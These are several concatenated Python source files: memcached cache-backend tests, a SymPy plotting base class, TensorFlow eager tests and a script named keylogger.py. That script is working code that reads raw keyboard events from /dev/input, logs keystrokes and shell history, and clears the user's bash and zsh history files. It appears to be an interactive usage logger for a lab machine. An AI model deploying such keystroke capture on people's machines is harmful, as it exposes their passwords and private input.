x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[3] == 3
n_batch = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_batch))) # result width
height = int(n_batch / width) # result height
tile_height = x.shape[1]
tile_width = x.shape[2]
result = np.zeros((int(height * tile_height),
int(width * tile_width), 3), dtype='uint8')
for i in range(height):
for j in range(width):
result[i * tile_height:(i + 1) * tile_height, j *
tile_width:(j + 1) * tile_width] = x[width*i+j]
return result
|
test_memcached_backend.py
|
from ._fixtures import _GenericBackendTest, _GenericMutexTest
from . import eq_, winsleep
from unittest import TestCase
from threading import Thread
import time
from nose import SkipTest
from dogpile.cache import compat
class _TestMemcachedConn(object):
@classmethod
def _check_backend_available(cls, backend):
try:
client = backend._create_client()
client.set("x", "y")
assert client.get("x") == "y"
except:
raise SkipTest(
"memcached is not running or "
"otherwise not functioning correctly")
class _NonDistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {
"key_mangler": lambda x: x.replace(" ", "_")
}
config_args = {
"arguments": {
"url": "127.0.0.1:11211"
}
}
class _DistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {
"key_mangler": lambda x: x.replace(" ", "_")
}
config_args = {
"arguments": {
"url": "127.0.0.1:11211",
"distributed_lock": True
}
}
class _DistributedMemcachedMutexTest(_TestMemcachedConn, _GenericMutexTest):
config_args = {
"arguments": {
"url": "127.0.0.1:11211",
"distributed_lock": True
}
}
class PylibmcTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.pylibmc"
class BMemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.bmemcached"
class MemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.memcached"
from dogpile.cache.backends.memcached import GenericMemcachedBackend
from dogpile.cache.backends.memcached import PylibmcBackend
from dogpile.cache.backends.memcached import MemcachedBackend
class MockGenericMemcachedBackend(GenericMemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockMemcacheBackend(MemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockPylibmcBackend(PylibmcBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url,
binary=self.binary,
behaviors=self.behaviors
)
class MockClient(object):
number_of_clients = 0
def __init__(self, *arg, **kw):
self.arg = arg
self.kw = kw
self.canary = []
self._cache = {}
MockClient.number_of_clients += 1
def get(self, key):
return self._cache.get(key)
def set(self, key, value, **kw):
self.canary.append(kw)
self._cache[key] = value
def delete(self, key):
self._cache.pop(key, None)
def __del__(self):
MockClient.number_of_clients -= 1
class PylibmcArgsTest(TestCase):
def test_binary_flag(self):
backend = MockPylibmcBackend(arguments={'url': 'foo','binary': True})
eq_(backend._create_client().kw["binary"], True)
def test_url_list(self):
backend = MockPylibmcBackend(arguments={'url': ["a", "b", "c"]})
eq_(backend._create_client().arg[0], ["a", "b", "c"])
def test_url_scalar(self):
backend = MockPylibmcBackend(arguments={'url': "foo"})
eq_(backend._create_client().arg[0], ["foo"])
def test_behaviors(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"behaviors": {"q": "p"}})
eq_(backend._create_client().kw["behaviors"], {"q": "p"})
def test_set_time(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"memcached_expire_time": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"min_compress_len": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
def test_no_set_args(self):
backend = MockPylibmcBackend(arguments={'url': "foo"})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{}])
class MemcachedArgstest(TestCase):
def test_set_time(self):
backend = MockMemcacheBackend(arguments={'url': "foo",
"memcached_expire_time": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockMemcacheBackend(arguments={'url': "foo",
"min_compress_len": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
class LocalThreadTest(TestCase):
def setUp(self):
import gc
gc.collect()
eq_(MockClient.number_of_clients, 0)
def test_client_cleanup_1(self):
self._test_client_cleanup(1)
def test_client_cleanup_3(self):
self._test_client_cleanup(3)
def test_client_cleanup_10(self):
self._test_client_cleanup(10)
def _test_client_cleanup(self, count):
backend = MockGenericMemcachedBackend(arguments={'url': 'foo'})
canary = []
def f():
backend._clients.memcached
canary.append(MockClient.number_of_clients)
time.sleep(.05)
threads = [Thread(target=f) for i in range(count)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(canary, [i + 1 for i in range(count)])
if compat.py27:
eq_(MockClient.number_of_clients, 0)
else:
eq_(MockClient.number_of_clients, 1)
|
plot_mode_base.py
|
from __future__ import print_function, division
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core import S
from sympy.core.compatibility import is_sequence
from time import sleep
import warnings
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe': 1, 'solid': 2, 'both': 3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85, 0.85, 0.85)
default_solid_color = (0.6, 0.6, 0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except Exception:
warnings.warn("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self.cbounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f):
f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f):
f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.isSet():
return
self._calculating_verts.set()
try:
self._on_calculate_verts()
finally:
self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.isSet():
return
while self._calculating_cverts.isSet():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try:
self._on_calculate_cverts()
finally:
self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.isSet()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.isSet()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None:
return
if v == '':
step_max = 0
for i in self.intervals:
if i.v_steps is None:
continue
step_max = max([step_max, int(i.v_steps)])
v = ['both', 'solid'][step_max > 40]
if v not in self.styles:
raise ValueError("v should be there in self.styles")
if v == self._style:
return
self._style = v
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if is_sequence(v):
v = ColorScheme(*v)
else:
v = ColorScheme(v)
if repr(v) == repr(self._color):
return
self._on_change_color(v)
self._color = v
except Exception as e:
raise RuntimeError(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [('mode', self.primary_alias),
('color', str(self.color)),
('style', str(self.style))]
o = "'%s'" % (("; ".join("%s=%s" % (k, v)
for k, v in d if v != 'None')))
return ", ".join([f, i, o])
|
keylogger.py
|
# import needed modules
import os
import getpass
from datetime import datetime
#import pyxhook
import traceback
import threading
import argparse
import time
#import clipboard
import logging
import re
import struct
from shutil import copyfile
userIn = [] # string buffer before storing in file (during RETURN)
currIndex = 0 # cursor index (for insert, backspace, delete, etc)
logsFolder = None
bashPath = ""
zshPath = ""
#new_hook = None
def setArgs():
global logsFolder
parser = argparse.ArgumentParser()
parser.add_argument("--logsFolder", help="path where logs are stored (default=/tmp/USAGE_LOGS)", action="store")
args = parser.parse_args()
if isinstance(args.logsFolder, str):
logsFolder = args.logsFolder
if not logsFolder[-1:] == "/":
logsFolder += "/"
else:
logsFolder = "/tmp/USAGE_LOGS/"
print(f"Logs will be stored in {logsFolder}")
def backupAndClear(path):
try:
copyfile(path, f"{path}_bak")
open(path, 'w').close()
print(f"backed up file @ {path}")
except:
print(traceback.format_exc())
print(f"unable to backup and clear {path}")
"""
# CLIPBOARD LOGGING FUNCTIONS
def logClipboard():
global logsFolder
clipboardLogPath = logsFolder+"clipboard.log"
oldContent = ""
newContent = ""
while True:
newContent = clipboard.paste()
if not (newContent == None or newContent == "") and (not newContent == oldContent):
t = time.strftime("%H:%M:%S", time.localtime())
with open(clipboardLogPath, 'a') as f:
if not newContent[-1:] == '\n':
f.write(f"ENTRY @ {t}\n{newContent}\n")
else:
f.write(f"ENTRY @ {t}\n{newContent}")
oldContent = newContent
logging.debug(f"Written to clipboard log @ {t}")
time.sleep(1)
def runClipboardLogging():
print("Starting ClipboardLogger Thread...")
cbThread = threading.Thread(target=logClipboard, name='clipboardLogger', daemon=True)
cbThread.start()
"""
# BASH HISTORY LOGGING FUNCTIONS
def findFile(fname, base):
#logging.debug("Find FIle entered")
paths = None
for root,dirs,files in os.walk(base):
#logging.debug(f"{root} {dirs} {files}")
# only look in /root or /home
if fname in files:
paths = os.path.join(root, fname)
#logging.debug(f"{paths}")
return paths
def appendShellLogs(histPath, logsPath):
#logging.debug("appendShellLogs")
pos = 0
# check for file exists
if not os.path.exists(logsPath):
open(logsPath, 'a').close()
# get latest 5 lines from logs
with open(logsPath, 'r') as f:
logs = f.readlines()
#print("logs readline")
#print(logs)
if logs and not logs == []:
latest = logs[-3:]
#print("latest 3")
#print(latest)
with open(histPath, 'r') as g:
hist = g.readlines()
#print("history readline")
#print(hist)
if hist and not hist == []:
#for i in range(0, len(hist)):
#print("I: {0} | CONT: {1}".format(i, hist[i]))
hasMatch = False
for pos in range(0, len(hist)):
#print("pos = " + str(pos))
#print("{0} @ POS {1}".format(hist[pos], pos))
if hist[pos] == latest[0]:
# possible match, checking next 2 entries
#print("match found @ " + str(pos))
try:
if hist[pos+1] == latest[1] and hist[pos+2] == latest[2]:
# copy lines pos -> len(hist) into logs
hist = hist[pos+3:]
if not hist == []:
with open(logsPath, 'a') as f:
f.writelines(hist)
hasMatch = True
break
except IndexError:
#print("END OF FILE, NO MATCHES")
break
if not hasMatch:
with open(logsPath, 'a') as f:
f.writelines(hist)
else:
with open(histPath, 'r') as g:
with open(logsPath, 'a') as f:
f.writelines(g.readlines())
#print("history saved")
def logShellHistory(runOnce=False):
global logsFolder, bashPath, zshPath
#logging.basicConfig(level=logging.DEBUG, format='%(threadName)s %(message)s')
#logging.debug("Run logShellHistory")
bashLogsPath = logsFolder+"bash.log"
zshLogsPath = logsFolder+"zsh.log"
#logging.debug("OUT: {0} {1} {2} {3} {4}".format(user, bashPath, zshPath, bashLogsPath, zshLogsPath))
if not runOnce:
while True:
#logging.debug("While True entered....")
if bashPath and not bashPath == "":
appendShellLogs(bashPath, bashLogsPath)
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
else:
print("bash history not available, skipping")
if zshPath and not zshPath == "":
appendShellLogs(zshPath, zshLogsPath)
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
else:
print("zsh history not available, skipping")
time.sleep(5*60) # do every 5mins
else:
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
if bashPath and not bashPath == "":
appendShellLogs(bashPath, bashLogsPath)
if zshPath and not zshPath == "":
appendShellLogs(zshPath, zshLogsPath)
#logging.debug("leave logShellHistory")
def runShellLogging():
#print("Starting Shell Logger Thread...")
# start bashlogger
blThread = threading.Thread(target=logShellHistory, name='shellLogger', daemon=True)
blThread.start()
#print("Started LOGGER")
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9", 11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]",
15: "[TAB]", 16: "q", 17: "w", 18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "[", 27: "]",
28: "[ENTER]", 29: "[CTRL]", 97: "[CTRL]", 100: "[ALT]",
30: "a", 31: "s", 32: "d", 33: "f", 34: "g", 35: "h", 36: "j", 37: "k", 38: "l", 39: ";", 40: "'", 41: "`", 42: "[SHIFT]", 43: "\\",
44: "z", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: "m", 51: ",", 52: ".", 53: "/", 54: "[SHIFT]", 55: "[FN]", 56: "[ALT]", 57: " ", 58: "[CAPS_LOCK]",
105: "LEFT", 106: "RIGHT", 103: "UP", 108: "DOWN", 111: "DEL", 107: "END", 102: "HOME", 69: "NUM_LOCK", 104: "PAGE_UP", 109: "PAGE_DOWN",
82: "0", 83: ".", 79: "1", 80: "2", 81: "3", 75: "4", 76: "5", 77: "6", 71: "7", 72: "8", 73: "9", 98: "/", 55: "*", 74: "-", 78: "+", 96: "[ENTER]"
}
shifted_qwerty_map = {
2: "!", 3: "@", 4: "#", 5: "$", 6: "%", 7: "^", 8: "&", 9: "*", 10: "(", 11: ")", 12: "_", 13: "+", 14: "[BACKSPACE]",
15: "[TAB]", 16: "Q", 17: "W", 18: "E", 19: "R", 20: "T", 21: "Y", 22: "U", 23: "I", 24: "O", 25: "P", 26: "{", 27: "}",
28: "[ENTER]", 29: "[CTRL]", 97: "[CTRL]", 100: "[ALT]",
30: "A", 31: "S", 32: "D", 33: "F", 34: "G", 35: "H", 36: "J", 37: "K", 38: "L", 39: ":", 40: "\"", 41: "~", 42: "[SHIFT]", 43: "|",
44: "Z", 45: "X", 46: "C", 47: "V", 48: "B", 49: "N", 50: "M", 51: "<", 52: ">", 53: "?", 54: "[SHIFT]", 55: "[FN]", 56: "[ALT]", 57: " ", 58: "[CAPS_LOCK]",
105: "LEFT", 106: "RIGHT", 103: "[UP]", 108: "[DOWN]", 111: "DEL", 107: "END", 102: "HOME", 69: "NUM_LOCK", 104: "PAGE_UP", 109: "PAGE_DOWN",
82: "0", 83: ".", 79: "1", 80: "2", 81: "3", 75: "4", 76: "5", 77: "6", 71: "7", 72: "8", 73: "9", 98: "/", 55: "*", 74: "-", 78: "+", 96: "[ENTER]"
}
# KEYBOARD INPUT LOGGING FUNCTIONS
def runKeyLogging():
global logsFolder
# specify the name of the file (can be changed )
log_file = logsFolder+'keylogger.log'
# the logging function with {event parm}
def OnKeyPress(ch):
global userIn, currIndex
if ch == "[ENTER]":
#print('ENTERED')
if not userIn == []:
with open(log_file, "a") as f: # open a file as f with Append (a) mode
f.write(f"{''.join(userIn)}\n")
userIn = [] # clear userIn
currIndex = 0
else:
if 'LEFT' in ch: # if Left pressed and not at start of string
if not currIndex <= 0:
currIndex -= 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
elif 'RIGHT' in ch: # if Right pressed and not at end of string
if not currIndex >= len(userIn):
currIndex += 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
elif 'BACKSPACE' in ch:
if currIndex == 0:
pass # backspace does nth at pos 0
else:
userIn = userIn[:currIndex-1] + userIn[currIndex:]
currIndex -=1
#print("USERIN: " + "".join(userIn))
elif 'DEL' in ch:
userIn = userIn[:currIndex] + userIn[currIndex+1:] # remove single character
#print("USERIN: " + "".join(userIn))
elif 'END' in ch:
currIndex = len(userIn) # move to end of string
elif 'HOME' in ch:
currIndex = 0
elif any(x in ch for x in ['CTRL', 'ALT', 'NUM_LOCK', 'PAGE_', 'SHIFT', 'UP', 'DOWN']): #, 'CAPS_LOCK', 'SHIFT']):
pass # prevent weird characters from being entered
else:
userIn.insert(currIndex, ch)
print("USERIN: " + "".join(userIn))
currIndex += 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
with open("/proc/bus/input/devices") as f:
lines = f.readlines()
pattern = re.compile("Handlers|EV=")
handlers = list(filter(pattern.search, lines))
pattern = re.compile("EV=120013")
for idx, elt in enumerate(handlers):
if pattern.search(elt):
line = handlers[idx - 1]
pattern = re.compile("event[0-9]")
infile_path = "/dev/input/" + pattern.search(line).group(0)
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
typed = ""
shifted = False
while event:
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code == 54 or code == 42:
if value == 0:
shifted = False
else:
shifted = True
if code != 0 and type == 1 and value == 1:
print(f"[{code}]")
if code in qwerty_map:
if shifted:
OnKeyPress(shifted_qwerty_map[code])
else:
OnKeyPress(qwerty_map[code])
try:
event = in_file.read(EVENT_SIZE)
except KeyboardInterrupt:
print("\nBefore stopping keylogger, ensure all shell tabs/windows \n\
have been closed (excluding this tab), before stopping keylogger.py \n\
This ensures that shell history is updated!\n")
opt = input("Stop keylogger? [y/n]: ")
# if not y, ignore exit request
if not (opt == None or opt == '') and opt == 'y':
logShellHistory(runOnce=True)
in_file.close()
break
except:
print(traceback.format_exc())
break
if __name__ == "__main__":
print("To work properly, ensure this program is started by the primary user and console window.")
input("Press enter to continue")
print("Backup of .bash_history and .zsh_history will be made, and history files will be cleared.\nBacked up logs are stored in user home directory.")
input("Press enter to acknowledge")
# run backing up of history file, and clear history file
while True:
isRootUser = input("Is the current user root? [Y / N]")
if isRootUser.lower() == 'y':
base = '/root'
break
elif isRootUser.lower() == 'n':
currUser = input("Enter current username:")
if not currUser == '' and os.path.exists(f'/home/{currUser}'):
base = f'/home/{currUser}'
break
else:
print('Invalid username!\n')
else:
print("Not a valid input!\n")
#logging.debug(f"{user}")
bashPath = findFile(".bash_history", base) # for the older kali using bash
#logging.debug("2")
zshPath = findFile(".zsh_history", base) # for the newer kali using zsh
startShellLogging = True
if bashPath and os.path.exists(bashPath):
backupAndClear(bashPath)
print("Backed up .bash_history")
if zshPath and os.path.exists(zshPath):
backupAndClear(zshPath)
print("Backed up .zsh_history")
if not zshPath and not bashPath:
print("Unable to detect any shell logs available, shell logging will be ignored.")
startShellLogging = False
print("Starting...")
setArgs()
if not os.path.exists(logsFolder):
# create the logs folder
os.makedirs(logsFolder)
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s %(message)s')
#logging.debug("some text")
#runClipboardLogging()
if startShellLogging:
runShellLogging()
runKeyLogging()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
